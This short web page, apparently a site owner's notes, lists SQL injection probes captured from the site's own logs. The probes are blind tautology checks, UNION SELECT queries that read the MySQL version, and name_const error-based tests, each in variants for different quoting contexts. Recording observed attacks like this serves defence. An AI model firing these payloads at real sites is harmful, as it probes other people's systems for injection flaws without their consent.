On this page I will try to document all SQL injection attempts from this website's logs. All of them are blind SQL injections (to test whether your application is vulnerable to SQL injection) and my bet is that they are performed using automated software crawling throught internet rather than some guy in his mother's basement. Also all of them are from GET requests.
Basic check:
URL and 1=1
Check for MySQL version:
URL999999.1 union select unhex(hex(version())) -- and 1=1
URL99999' union select unhex(hex(version())) -- 'x'='x
URL99999" union select unhex(hex(version())) -- "x"="x
Yet another blind check:
URL or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1
URL' or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1
URL" or (1,2)=(select*from(select name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a) -- and 1=1